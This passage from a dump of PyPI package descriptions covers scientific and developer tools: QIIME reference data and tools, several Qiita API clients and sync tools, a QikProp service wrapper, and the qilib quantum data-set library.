The current default reference data is compiled\nfrom the Greengenes 16S rRNA database version13_8.\nPlease see theAttributionsection below for more details.InstallationTo install qiime-default-reference:pip install qiime-default-referenceRunning the testsTo run qiime-default-reference\u2019s unit tests:nosetests --with-doctest qiime_default_referenceAttributionThe reference data distributed in this Python package were copied from theGreengenes 16S rRNA database:An improved Greengenes taxonomy with explicit ranks for ecological and\nevolutionary analyses of bacteria and archaea.McDonald D, Price MN, Goodrich J, Nawrocki EP, DeSantis TZ, Probst A,\nAndersen GL, Knight R, Hugenholtz P.\nISME J. 2012 Mar;6(3):610-8. doi: 10.1038/ismej.2011.139.The Greengenes reference data is licensed under aCreative Commons Attribution-ShareAlike 3.0 Unported License.The default template alignment column mask (i.e., \u201cLane mask\u201d) is derived from:Lane,D.J. (1991)16S/23S rRNA sequencing.In Stackebrandt,E. and\nGoodfellow,M. (eds), Nucleic Acid Techniques in Bacterial Systematics.\nJohn Wiley and Sons, New York, pp. 115-175.Lane mask was originally available inARB.Lane mask taken fromhere.Getting HelpPlease post your questions about this repository/package on theQIIME Forum."} +{"package": "qiime-tools", "pacakge-description": "NOTICEThe QIIME-tools project is now obsolete and has been\nreplaced byPhyloToAST. The new project is available on GitHub and\non PyPI. PhyloToAST can be installed with pip:$pipinstallphylotoastQIIME-toolsThe QIIME-tools project is a collection of python code and scripts that\nmodify the original QIIME [1] pipeline by adding/changing several\nsteps including: support for cluster-computing, multiple primer support\n(eliminate primer bias) [2], enhanced support for species-specific\nanalysis, and additional visualization tools.InstallationTo install QIIME-tools from PyPI:$pipinstallqiime-toolsFrom source:$pythonsetup.pyinstallDocumentationFull documentation for the scripts and code is available at theQIIME-tools documentation siteRequirementsmatplotlibfor PCoA plots.Biopythonfor some sequence and fastq\nprocessing, although its use is being phased out.fuzzpyfor the\notu_calc module. Note that these are not listed as dependencies in the install\nscript because they are not required for all functionality. Install as needed.SourceTheQIIME-tools sourceis hosted on github.CitingA manuscript describing the qiime-tools software is currently in\npreparation. Until publication, please cite the github repository and\nthe author: Shareef M. Dabdoub.Publications using QIIME-toolsMason et al.,The subgingival microbiome of clinically healthy current\nand never smokers. The ISME Journal, 2014;doi:10.1038/ismej.2014.114Dabdoub et al.,Patient-specific Analysis of Periodontal and Peri-implant Microbiomes.\nJournal of Dental Research, 2013;doi: 10.1177/0022034513504950References[1] J Gregory Caporaso, et al.,QIIME allows analysis of\nhigh-throughput community sequencing data. Nature Methods, 2010;doi:10.1038/nmeth.f.303[2] Kumar PS, et al.,Target Region Selection Is a Critical Determinant\nof Community Fingerprints Generated by 16S Pyrosequencing. 
PLoS ONE\n(2011) 6(6): e20956.doi:10.1371/journal.pone.0020956"} +{"package": "qiipy", "pacakge-description": "No description available on PyPI."} +{"package": "qi-irida-utils", "pacakge-description": "# QI IRIDA Utils[![Linux](https://img.shields.io/travis/happykhan/qi-irida-utils.svg)](https://travis-ci.org/happykhan/qi-irida-utils)\n[![Windows build status on\nAppveyor](https://ci.appveyor.com/api/projects/status/github/happykhan/qi-irida-utils?branch=master&svg=true)](https://ci.appveyor.com/project/happykhan/qi-irida-utils/branch/master)\n[![Documentation\nStatus](https://readthedocs.org/projects/qi-irida-utils/badge/?version=latest)](https://qi-irida-utils.readthedocs.io/en/latest/?badge=latest)\n[![pypi](https://img.shields.io/pypi/v/qi-irida-utils.svg)](https://pypi.python.org/pypi/qi-irida-utils)\n[![Docker build\nstatus](https://img.shields.io/docker/pulls/happykhan/qi-irida-utils.svg)](https://hub.docker.com/r/happykhan/qi-irida-utils)[![Coverage](https://img.shields.io/coveralls/happykhan/qi-irida-utils/master.svg)](https://coveralls.io/r/happykhan/qi-irida-utils/)\n[![Coverage](https://img.shields.io/scrutinizer/g/happykhan/qi-irida-utils.svg)](https://scrutinizer-ci.com/g/happykhan/qi-irida-utils/?branch=master)\n[![Updates](https://pyup.io/repos/github/happykhan/qi-irida-utils/shield.svg)](https://pyup.io/repos/github/happykhan/qi-irida-utils/)Helper scripts for working with IRIDASee the documentation for more details:\n.## Introduction## Quick start## Installation## Usage## Outputs## LicenseQI IRIDA Utils is free software, licensed under GNU General Public\nLicense v3## Feedback/IssuesPlease report any issues to the [issues\npage](https://github.com/happykhan/qi-irida-utils/issues).## CitationQI IRIDA Utils is not formally published. 
Please cite\nThis package was created with\n[Cookiecutter](https://github.com/audreyr/cookiecutter) and the [QI\npython template](https://github.com/happykhan/qi-python-package) project\ntemplate.# History## 0.1.0 (2019-01-22)First release on PyPI."} +{"package": "qiita", "pacakge-description": "Python wrapper for Qiita API v1.Installation$ virtualenv --distribute qiita_sample\n$ source qiita_sample/bin/activate\n$ cd qiita_sample\n$ pip install qiitaQiita depends onRequests.UsageGet user\u2019s items# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items()\nitems = client.user_items('heavenshell')Get tag\u2019s items# -*- coding: utf-8 -*-\nfrom qiita import Tags\n\nclient = Tags()\nitems = client.tag_items('python')Get a specified item with comments and raw markdown content# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items()\nitem_uuid = '1234567890abcdefg'\nitems = client.item(item_uuid)Authenticated requestsLogin with \u201cusername & password\u201d or \u201ctoken\u201d# -*- coding: utf-8 -*-\nfrom qiita import Client\n\nclient = Client(url_name='heavenshell', password='mysecret')\ntoken = client.token # => contains token\n# or\nclient = Client(token='myauthtoken')Get my items# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Client(token='myauthtoken')\nitems = client.user_item()Post/Update/Delete an item# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Client(token='myauthtoken')\nparams = {\n 'title': 'Hello',\n 'body': 'markdown text',\n 'tags': [{name: 'python', versions: ['2.6', '2.7']}],\n 'private': False\n}\n# post\nitem = client.post_item(params)\n\n# update\nparams['title'] = 'modified'\nclient.update_item(item['uuid'], params)\n\n# delete\nclient.delete_item(item['uuid'])Stock/Unstock item# -*- coding: utf-8 -*-\nfrom qiita import Items\n\nclient = Items(token='myauthtoken')\nitem_uuid = '1489e2b291fed74713b2'\n# Stock\nclient.stock_item(item_uuid)\n\n# Unstock\nclient.unstock_item(item_uuid)ContributingFork itCreate your feature branch (git checkout -b my-new-feature)Commit your changes (git commit -am \u2018Add some feature\u2019)Push to the branch (git push origin my-new-feature)Create new Pull Request"} +{"package": "qiita_api_wrapper", "pacakge-description": "Qiita API V2 wrapper for Python. 
detail linkhttps://qiita.com/api/v2/docs#%E3%82%B3%E3%83%A1%E3%83%B3%E3%83%88"} +{"package": "qiitacli", "pacakge-description": "Welcome to QiitaCLI\u2019s documentation!Qiita CLI ClientCUI\u3067Qiita\u306e\u6295\u7a3f\u3092\u3057\u305f\u304f\u3066\u4f5c\u3063\u305f\u3082\u306e\u3067\u3059\u3002Install$pipinstallqiitacliDocumenthttps://mypaceshun.github.io/qiitacliQuickStart\u4e8b\u524d\u6e96\u5099Qiita\u306b\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u4f5c\u6210https://qiita.com/Qiita\u500b\u4eba\u7528\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u53d6\u5f97Qiita\u306b\u30ed\u30b0\u30a4\u30f3\u5f8c\u3001\u8a2d\u5b9a\u2192\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u2192\u500b\u4eba\u7528\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u306e\u3068\u3053\u308d\u304b\u3089\u65b0\u3057\u304f\u30c8\u30fc\u30af\u30f3\u3092\u767a\u884c\u3059\u308b\u3002\u30b9\u30b3\u30fc\u30d7\u306fread_qiita\u3068write_qiita\u306b\u30c1\u30a7\u30c3\u30af\u3092\u5165\u308c\u3066\u304f\u3060\u3055\u3044\u3002\u767a\u884c\u5f8c\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u304c\u8868\u793a\u3055\u308c\u308b\u306e\u3067\u30b3\u30d4\u30fc\u30da\u30fc\u30b8\u3092\u96e2\u308c\u308b\u3068\u518d\u5ea6\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u8868\u793a\u3059\u308b\u3053\u3068\u306f\u51fa\u6765\u307e\u305b\u3093status\u30b3\u30de\u30f3\u30c9\u3092\u5229\u7528\u3057\u3066\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u4fdd\u5b58\u3057\u307e\u3059\u3002$qiitaclistatusInput your personal accesstoken: xxxxx\nid : mypaceshun\nname : shun kawai\nlocation : Tokyo Japan\n...\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u306f\u30c7\u30d5\u30a9\u30eb\u30c8\u3067$HOME/.qiitacli.secret\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u76f4\u63a5\u7de8\u96c6\u3059\u308b\u3053\u3068\u3067\u3082\u3001\u30a2\u30af\u30bb\u30b9\u30c8\u30fc\u30af\u30f3\u3092\u8a2d\u5b9a\u51fa\u6765\u307e\u3059\u3002\u8a18\u4e8b\u4e00\u89a7\u53d6\u5f97$qiitaclilist-iduid|date|title|url\nc3b97c4eee490d662092|2019-10-18T19:35:23+09:00|Qiita CLI Application \u4f5c\u3063\u3066\u307f\u305f|https://qiita.com/mypaceshun/items/c3b97c4eee490d662092\nab441d26a12489d5fcbd|2019-02-01T11:37:55+09:00|ansible 
\u301c\u3064\u306a\u3050\u301c|https://qiita.com/mypaceshun/items/ab441d26a12489d5fcbd\nb1f3786ce0580201a9e1|2018-12-16T07:01:55+09:00|python\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092rpm\u306b\u30d1\u30c3\u30b1\u30fc\u30b8\u30f3\u30b0|https://qiita.com/mypaceshun/items/b1f3786ce0580201a9e1\n5067561d6739cc9e5199|2018-12-19T10:58:45+09:00|spec\u30d5\u30a1\u30a4\u30eb\u5927\u89e3\u5256|https://qiita.com/mypaceshun/items/5067561d6739cc9e5199\nfeedced17884d798fbbd|2016-03-14T13:03:04+09:00|XAMPP\u3067Apache\u3092\u8d77\u52d5\u3057Android\u304b\u3089\u63a5\u7d9a|https://qiita.com/mypaceshun/items/feedced17884d798fbbd\nc489327d525522de5e65|2016-02-15T10:48:32+09:00|AndroidStudio2.0\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u307f\u308b|https://qiita.com/mypaceshun/items/c489327d525522de5e65\u8a18\u4e8b\u306e\u6295\u7a3f$qiitacliuploadarticle.md\u8a18\u4e8b\u7528\u306eMarkdown\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3001YAML\u5f62\u5f0f\u306e\u30d8\u30c3\u30c0\u30fc\u3092\u5229\u7528\u3057\u3066\u3001\u30bf\u30a4\u30c8\u30eb\u3084\u30bf\u30b0\u306a\u3069\u306e\u60c5\u5831\u3092\u8a18\u8ff0\u3057\u307e\u3059\u3002title\u3068tags\u306e\u60c5\u5831\u304c\u5fc5\u9808\u3067\u3001\u8a2d\u5b9a\u304c\u7121\u3044\u5834\u5408\u306f\u30b3\u30de\u30f3\u30c9\u304c\u5931\u6557\u3057\u307e\u3059\u3002qiitacli.md\u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u8a18\u4e8b\u306e\u66f4\u65b0$qiitacliupdatearticleidarticle.md\u8a18\u4e8b\u3092\u66f4\u65b0\u3059\u308b\u969b\u306f\u6295\u7a3f\u306b\u7528\u3044\u305fMarkdown\u30d5\u30a1\u30a4\u30eb\u3068\u540c\u69d8\u306e\u5f62\u5f0f\u3067\u8a18\u4e8b\u7528\u30d5\u30a1\u30a4\u30eb\u3092\u7528\u610f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u307e\u305f\u4e0a\u66f8\u304d\u3059\u308b\u305f\u3081\u306e\u66f4\u65b0\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u304c\u5fc5\u8981\u306b\u306a\u308a\u307e\u3059\u3002list\u30b3\u30de\u30f3\u30c9\u306a\u3069\u3092\u7528\u3044\u3066\u66f4\u65b0\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u3092\u63a2\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002\u8a18\u4e8b\u306e\u524a\u9664$qiitaclideletearticleid\u8a18\u4e8b\u306e\u524a\u9664\u3067\u306f\u3001\u524a\u9664\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u304c\u5fc5\u8981\u306b\u306a\u308a\u307e\u3059\u3002list\u30b3\u30de\u30f3\u30c9\u306a\u3069\u3092\u7528\u3044\u3066\u524a\u9664\u5bfe\u8c61\u306e\u8a18\u4e8b\u306eID\u3092\u63a2\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002Release\u30ea\u30ea\u30fc\u30b9\u30ce\u30fc\u30c8"} +{"package": "qiita-spots", "pacakge-description": "Qiita (canonically pronouncedcheetah) is an analysis environment for microbiome (and other \u201ccomparative -omics\u201d) datasets. You can find the public Qiita server athttp://qiita.microbio.me.Qiita is currently in alpha status. We are very open to community contributions and feedback. If you\u2019re interested in contributing to Qiita, seeCONTRIBUTING.md. 
If you\u2019d like to report bugs or request features, you can do that in theQiita issue tracker.To install and configure your own Qiita server, seeINSTALL.md."} +{"package": "qiita-sync", "pacakge-description": "Qiita-SyncQiita-Sync is a GitHub Actions that can synchronize your markdown files in GitHub repository with Qiita articles.It can be also used as a command line tool.\nSee more detailsQiita-Sync Command Usagefor command usage.InstallationQiita Access TokenGenerate your access tokenOpenQiita Account ApplicationsClick \"Generate new token\"Copy the access token displayed.Save the access token to GitHubOpen your GitHub repositoryGo \"Settings\" >> \"Secrets\"Click \"New repository secrets\"Save the access token with the nameQIITA_ACCESS_TOKENGitHub ActionsDownload 2 YAML files of GitHub Actionsqiita_sync.ymlqiita_sync_check.ymlSave them in your repository as:.github/workflow/qiita_sync.yml.github/workflow/qiita_sync_check.ymlNOTE: Change the cron timecron: \"29 17 * * *\"ofqiita_sync_check.ymlwhich is the time\nwhen this action is sheduled to be executed.29 17 * * *indicates that this action is\nexecuted every day at 17:29 UTC, which is kind of inactive time for me who is living in Japan.\nPlease adjust it to your convenience.Push them to GitHubBadgeYou can add the link to badge in your README file to show if Qiita and GitHub are successfully synchronized or not.\nPlease replaeceandof your own.![Qiita Sync](https://github.com///actions/workflows/qiita_sync_check.yml/badge.svg)Then the badge will be displayed in your README file.synchronized badge:unsynchronized badge:SynchronizationWhen you notice the failure of synchronization by the badge in README or e-mail notification from GitHub,\nyou can manually run Qiita-Sync GitHub Actions to synchronize them again.Open your GitHub repositoryGo \"Actions\" >> \"Qiita Sync\" (in left pane)Click \"Run workflow\" (in right pane)Writing ArticlesPlease note some features of Qiita-Sync when writing articles.File NameWhen downloading Qiita article files at first, their file names are like2020-07-08_TypeScript_d3c8f2234ea428e4563a.mdwhose\nnaming convention is \"__.md\". For your convenience,\nyou can rename those files as you like and can move them to any subdirectories within your git repository directory.Article HeaderEach downloaded article file has a header. This header is automatically generated when downloaded from Qiita site.\nAnd it is automatically removed when uploaded to Qiita site.You can cangetitleandtagsas you like. Howeveryou must not removeidfrom the header.\nIt's a key information for synchronization with Qiita site.And thisidmust be unique. 
Only one file can included it in the header.\nPlease not to create article files that have sameid, which can happen when copying an article file.When creating new article file, you don't needidin the header.Theidwill be automatically added to the header after uploaded to Qiita site.Links to Qiita articleYou can use a relative file path as a link to another your article file.\n[My Article](../my-article.md)This link will be automatically changed to the URL when uploaded to Qiita site.\n[My Article](https://qiita.com/ryokat3/items/a5b5328c93bad615c5b2)And it will be automatically changed to the relative file path when downloaded from Qiita site.Links to image fileYou can use a relative file path as a link to an image file.\n![My Image](../image/earth.png)This link will be automatically changed to the URL when uploaded to Qiita site.\n![My Image](https://raw.githubusercontent.com/ryokat3/qiita-articles/main/image/earth.png)And it will be automatically changed to the relative file path when downloaded from Qiita site.Revision HistoryVersionDateSummaryv1.4.42021-02-21- Fixed the issue #61, enchanced code block splitterv1.4.02021-01-21- Understandable file naming when initially downloadedv1.3.42021-01-18- Internal data enhancement, verbose optionsv1.3.32021-01-16- Fixed version numberv1.3.22021-01-15- Fixed packaging failurev1.3.12021-01-15- Fixed many issues when used as CLIv1.3.02021-01-15- Withdrawn from PyPIv1.2.02021-01-11- Fixed getting Git timestamp and branch namev1.1.12021-01-11- Withdrawn from PyPIv1.1.02021-01-10- Initial release"} +{"package": "qiita_v2", "pacakge-description": "Api document:http://qiita.com/api/v2/docsVersion0.2.0(2018/11/07)Setupqiita_v2: Python Package Indexpip install qiita_v2How to UseSimple usagefrom qiita_v2.client import QiitaClient\n\nclient = QiitaClient(access_token=)\nres = client.get_user('petitviolet')\nres.to_json()\n# => jsonified contentsLisenceMIT License"} +{"package": "qii-tool", "pacakge-description": "Quantitative Input Influence - an influence measures for Algorithmic TransparencyTheqii_toolpackage is an implementation of the QII method proposed in the paper\"Algorithmic Transparency via Quantitative Input Influence: Theory and Experiments with Learning Systems\". The original paper discusses the transparency-privacy tradeoff, whereas this particular package only exploits its transparency aspect to be used as an influence measures - an instance of interpretable machine learning.Installqii_toolon your system using:pipinstallqii_toolExamples can be found in thisrepository."} +{"package": "qi.jabberHelpdesk", "pacakge-description": "qi.jabberHelpdeskOverviewqi.jabberHelpdesk is a real-time helpdesk product for plone. With it you can create helpdesks as content objects. Clients access the helpdesks through the web, whereas helpdesk agents connect to the helpdesk server using their jabber accounts. A helpdesk can be linked to many jabber accounts and whenever a client asks for support, one is chosen randomly among the available agents. qi.jabberHelpdesk also supports:file transfersurl links and email addressessmileysIn order to run qi.jabberHelpdesk to your own site you need either:A free account on thechatblox.comsite in which case you don\u2019t need your own server, orTo run a helpdesk server (You will need three modules qi.xmpp.botfarm, qi.xmpp.client, qi.xmpp.admin all found on pypi). 
Please read their documentation for installation details.InstallationInstalling with buildoutIf you are usingbuildoutto manage your instance installing qi.jabberHelpdesk is very simple, just add qi.jabberHelpdesk in theeggssection and register it in thezcmlsections.Installing without buildoutIf you don\u2019t use buildout put it in INSTANCE/lib/python and add a file named qi.jabberHelpdesk-configure.zcml in INSTANCE/etc/package-includes with the following line:UsageFollow the following steps in order to create a helpdesk in your site:Add a helpdesk. If you don\u2019t use the helpdesk of your chatblox.com account you\u2019ll need to create a bot on your own jabber server that the helpdesk will use.Add the jabber ids of the agents to the helpdesk.The owners of the jabber ids should accept the bot as a contact.You are ready to go!Changelog for qi.jabberHelpdeskqi.jabberHelpdesk - 0.30Security fixes, some vulnerable xml-rpc calls fixed. [ggozad]qi.jabberHelpdesk - 0.22Changed name field to accept UTF8 characters. Thanks to Geir Baekholt for spotting this. [ggozad]qi.jabberHelpdesk - 0.21Fixed portlet issue with UberSelectionWidget. Credits to Graham Perrin for reporting it. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/7[ggozad]qi.jabberHelpdesk - 0.20Added the possibility to download chat transcripts. [ggozad]Improved error handling. [ggozad]Broke down css and kss resources so that they can be easily overriden. [ggozad]Added upgrade steps for Generic Setup. [ggozad]qi.jabberHelpdesk - 0.13The user is presented with the message \u201cNo available agents\u201d when no agents are available and tries to connect. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/3[ggozad]Improved the chat request screen for logged in members [ggozad]Fixed conflict with qi.jabberHelpdesk. Fixeshttp://plone.org/products/qi-jabberhelpdesk/issues/2[ggozad]qi.jabberHelpdesk - 0.12Forced all links that appear in the chat window to open in new windows. [ggozad]Added \u201cPlease wait while checking for available agents\u2026\u201d message while checking with xmlrpc server. [ggozad]qi.jabberHelpdesk - 0.11Fixed portlet, and added image field to it. [ggozad]qi.jabberHelpdesk - 0.1 UnreleasedInitial package structure. [zopeskel]"} +{"package": "qi.jwMedia", "pacakge-description": "Introductionqi.jwMedia is a plone add-on that provides audio/video content types. It uses the JW FLV MediaPlayer (http://www.longtailvideo.com/).\nIt supports the following features:\n1) Uses blobs if plone.app.blob is installed.\n2) Size, stretching, fullscreen are all settable.\n3) Watermarks.\n4) Closed captions.RTMP streaming is in working state but only using a customized Red5 streaming server. When finalized it will be released in a future version.Commercial UseJW Player is distributed under a non-GPL license and for commercial use you will need to purchase a license. Please see their site for details.Changelog0.5b3Fixed image setting on video and audio0.5b2Caption check fixed.Fixed typo for stretching field in video.0.5bAdded basic test0.4b2Properly uploaded correct svn branch;)0.4b1Initial release"} +{"package": "qikdb", "pacakge-description": "No description available on PyPI."} +{"package": "qikpropservice", "pacakge-description": "MolSSI QikProp As A Service API Wrapper LibraryA library which wraps the API calls for the QikProp v3 As A ServiceThe version of QikProp reached by this library has been provided byWilliam L. Jorgensenand hosted as a service by theMolecular Sciences Software Institute (MolSSI). 
To report a\nproblem or suggest improvements, please open an issue onthe Project GitHub. Additional features and options will be\nadded over time.This project serves as the Python wrapper for making the API calls by providing both an importable\nlibrary and a CLI tool to make calls to the QikProp Service.For direct information regarding the API endpoints, please seethe Project GitHub.Installation From Conda or PipThis package can be installed from either Conda (via Conda-Forge) or Pipcondainstall-cconda-forgeqikpropserviceORpipinstallqikpropserviceInstallation from SourceClone the repo athttps://github.com/MolSSI/qikpropserviceNavigate to the folderapiwrapperRunpython setup.py installUsage as a CLI ToolThe CLI can be run from any command line interface by invokingqikpropcliThe CLI provides its own documentation for how to use it, but most commonly can be used as such:qikpropclirunFILESWhereFILEScan be replaced with any number of entries of files to submit to the QikProp Service API endpoints.\nThere are options which can be specified here such as custom URI server's (e.g. for local testing) or QikProp\noptions, but all of those are documented in the--helpflag.Usage as a Python LibraryThere are two main library functions depending on if you want to do large bulk processing, or more fine-grained\nfile-by-file processing. In either use case, the library works on on-disk files rather than data pre-read\ninto memory.The main helper function isqikprop_as_a_servicewhich acts much as the CLI does in that it processes many files\nall the same way.fromqikpropserviceimportqikprop_as_a_serviceqikprop_as_a_service(\"file1.mol, file2.mol, ligand_series*.mol2\")This will run the two named filesfile1.mol,file2.moland all the files matching the globligand_series*.mol2.\nIt is possible to set the output name of each of the returned.tar.gzfiles through a keyword. Other options such as\nwhat settings that can be passed to QikProp are available as well. See the function docstring or callqikprop_as_a_service.__doc__to see the options.The second object is the API Endpoint call wrapperQikpropAsAServicewhich can be used to\nintegrate with exiting pipelines and make each of the API calls directly, without having to write the request itself\ndirectly. This class only works on a per-call/file basis. Theqikprop_as_a_servicefunction uses this class to make\nall of its calls and operations on each file. Its most common invocation is below (wrapped in a practical use), but\nthings such as the URI, endpoints, hashing functions, etc. can all be set in the class initialization.fromqikpropserviceimportQikpropAsAService,QikPropOptionsfromtimeimportsleepservice=QikpropAsAService()# Example of options, there are defaults for this model and it does not need to be passed to the Service calls# if only defaults are wantedoptions=QikPropOptions(fast=True,similar=30)success,ret_code,data=service.post_task(\"file1.mol\",options=options)task_id=data[\"id\"]whileTrue:success,ret_code,ret_data=service.get_result(task_id=task_id,output_file=\"file1_result.tar.gz\")ifsuccess:breaksleep(5)See the documentation for each class and function to see its options and expected returns.UtilityThere is an expected return code dataclass calledStatusCodes. 
It's a simple holder for information regarding the\nHTTP codes returned normally by the QikProp Service API Endpoint and what they mean.The class is imported withfromqikpropserviceimportStatusCodesStatusCodes.ready# 200StatusCodes.created# 201StatusCodes.staged# 202StatusCodes.error# 220StatusCodes.null# 404StatusCodes.unmatched# 409where each of the attributes and codes corresponds to a particular meaning.ready : 200 - GET and POSTTask is ready to pull down.created: 201 - POSTSubmitted task has been accepted by the server and no issues on input validation.staged: 202 - GETTask is queued in the service but has not been processed or is in processing.error : 220 - GETTask has been processed but had an error associated with processing. See data dict or pull error file for details.null : 404 - GETNo task exists on the server with a given IDunmatched : 409 - GET and POSTFor a provided task ID and file data, Checksum/hashing does not match"} +{"package": "qiletianTest", "pacakge-description": "No description available on PyPI."} +{"package": "qilib", "pacakge-description": "QILibQuantum Library for the Quantum Inspire platformInstallationThe Quantum Inspire Library can be installed from PyPI via pip:$ pip install qilibInstalling from sourceClone the qilib repository fromhttps://github.com/QuTech-Delft/qiliband install using pip:$ git clone git@github.com:QuTech-Delft/qilib.git\n$ cd qilib\n$ python3 -m venv env\n$ . ./env/bin/activate\n(env) $ pip install .For development install in editable mode:(env) $ pip install -e .[dev]Install Mongo databaseTo use the MongoDataSetIOReader and MongoDataSetIOWriter a mongodb needs to be installed.\nFor Windows, Linux or OS X follow the instructionshereon how to install the database.After installing the database it has to be configured asreplica setby\ntyping:mongod --replSet \"rs0\"and from within the mongo shell initiate with:rs.initiate()TestingRun all unittests and collect the code coverage:(env) $ coverage run --source=\"./src/qilib\" -m unittest discover -s src/tests -t src\n(env) $ coverage report -m###Type Checking\nFor static type checking, mypy can be used(env) $ cd src\n(env) $ mypy --strict --ignore-missing-imports --allow-untyped-calls -p qilibData setThe three main building blocks of the qilib data set are a DataArray, DataSet and a DataSetIO that provides a\nstorage backend for the DataSet.DataArrayA DataArray is a wrapper around a numpy array and can be used as one. A data array can also have another, or multiple,\ndata arrays as setpoints. For example, in a 2D-scan, there will be a 1D DataArray for the x-axis variable specifying a discrete set of setpoints\nfor that variable, a 2D DataArray for the y-axis variable using the x-axis DataArray as its values and a 2D DataArray\nfor the measured value.The DataArray constructor accepts either:pre-defined data (numpy arrays)array shapes (tuple)The DataArray makes sure that the dimensions of the set arrays are correct with regards to the data array and vice\nversa. 
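(Before the 2D example that follows, here is a minimal sketch of the two construction modes just described, pre-defined data versus a bare shape, assuming the same qilib.data_set API used throughout this section; the names and values are illustrative only.)

import numpy as np
from qilib.data_set import DataArray

# A setpoint array built from pre-defined data (a numpy array) ...
x = DataArray(name="x", label="x-axis", unit="mV", is_setpoint=True,
              preset_data=np.linspace(0.0, 1.0, 10))

# ... and a measurement array built from a shape only, with x as its setpoint array.
signal = DataArray(name="signal", label="signal", unit="a.u.",
                   set_arrays=(x,), shape=(10,))

Here the shapes agree, so the consistency check described above passes.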
That means, e.g., trying to set a 1D array of 10 elements as the data array with a 1D setpoint array of 8\nelements will raise an error.An example of a 2D measurement array,z, that is defined by the main setpoint arrayxand secondary setpoint\narrayy:import numpy as np\nfrom qilib.data_set import DataArray\n\nx_size = 10\ny_size = 5\nx_points = np.array(range(x_size))\ny_points = np.tile(np.array(range(y_size)), [x_size, 1])\nx = DataArray(name=\"x\", label=\"x-axis\", unit=\"mV\", is_setpoint=True, preset_data=x_points)\ny = DataArray(name=\"y\", label=\"y-axis\", unit=\"mV\", is_setpoint=True, preset_data=y_points)\nz = DataArray(name=\"z\", label=\"z-axis\", unit=\"ma\", set_arrays=(x,y), shape=(x_size, y_size))DataSetA DataSet object encompasses DataArrays. A DataSet can have multiple measurement arrays sharing the same setpoints.\nIt is an error to have multiple measurement arrays with different setpoints in one DataSet.A DataSet can be incrementally updated with theadd_data()method, which takes an index specification, a reference to\nthe array that is to be updated and the update data:index, {array_name: update_data}}. In case of multi dimensional\narrays whole rows, or rows of rows, can be updated together. For example:# this sets a single element at the 3rd setpoint along the x-axis, 4th along the y-axis\ndataset.add_data((2,3), {'z': 0.23})\n\n# given that dataset is a 10 x 3 2D dataset:\n# this sets the entire y-axis data at the 5th setpoint along the x-axis\n# ie. the data specifies a value for each of the setpoints along the y-axis\ndataset.add_data(4, {'z': [0.23, 2.6, 0.42]})DataSet specifications:The constructor may accept DataArrays for setpoints and data arrays. Multiple measurement arrays may be specified as\na sequence.The DataSet will raise errors on mismatches in array dimensions.The DataSet will only accept an array if its name does not equal that of any array already in the DataSet.Arrays can be read by the public property .data_arrays (a dict, key is the DataArray name, value the DataArray).\nIn addition, DataArrays are accessible as properties on the DataSet object (for example, an array with name 'x' added\nto a DataSet data_set can be access as data_set.x).Updates made to the DataSet will be sent to the underlying DataSetIOWriter if available.A DataSet can have one, or more, DataSetIOWriters.A DataSet can be instantiated with one DataSetIOReader but not both a DataSetIOWriter and a DataSetIOReader.DataSetIOWriterA DataSet can be instantiated with a DataSetIOWriter that provides a storage backend. All changes made on the DataSet\nare pushed to the storage. There are two DataSetIOWriter implementation available, MemoryDataSetIOWriter and\nMongoDataSetIOWriter.MemoryDataSetIOWriterProvides an in-memory storage backend that can be used for live plotting of a measurement. All data is kept in memory\nand not stored on disc or in database. MemoryDataSetIOWriter should not be instantiated directly but created, along with\na MemoryDataSetIOReader, using the MemoryDataSetIOFactory. The Reader and Writer share a storage queue used to pass\nupdates from one DataSet to another.io_reader, io_writer = MemoryDataSetIOFactory.get_reader_writer_pair()\ndata_set_consumer = DataSet(storage_reader=io_reader)\ndata_set_producer = DataSet(storage_writer=io_writer)MongoDataSetIOWriterProvides a connection to a mongo database that needs to be pre-installed. 
All updates to a DataSet are stored in the\nmongodb database as events that are collapsed, to represent the complete DataSet, when thefinalize()method is called\non the DataSet. Data can not be written to the database on a finalized DataSet.data_set_name = 'experiment_42'\nwriter = MongoDataSetIOWriter(name=data_set_name)\ndata_set = DataSet(storage_writer=writer, name=data_set_name)DataSetIOReaderClasses that implement the DataSetIOReader interface allow a DataSet to subscribe to data, and data changes, in an\nunderlying storage. To sync from storage thesync_from_storage(timeout)method on a DataSet has to be called. There\nare two implementations of the DataSetIOReader, the MemoryDataSetIOReader and MongoDataSetIOReader.MemoryDataSetIOReaderProvides a way to subscribe to data that is put on a storage queue by a paired MemoryDataSetIOWriter created by the\nMemoryDataSetIOFactory.MongoDataSetIOReaderThe MongoDataSetIOReader creates a connection to a mongodb and subscribes to changes in the underlying document. To\nupdate a DataSet that has been instantiated with a MongoDataSetIOReader a call on the DataSet'ssync_from_storage(timeout)method has to be made. To load a DataSet from the underlying mongodb a static methodload(name, document_id)can be\ncalled with either the DataSet name or _id or both.In the example below, a DataSet is instantiated with MongoDataSetIOReader, synced from storage and the data 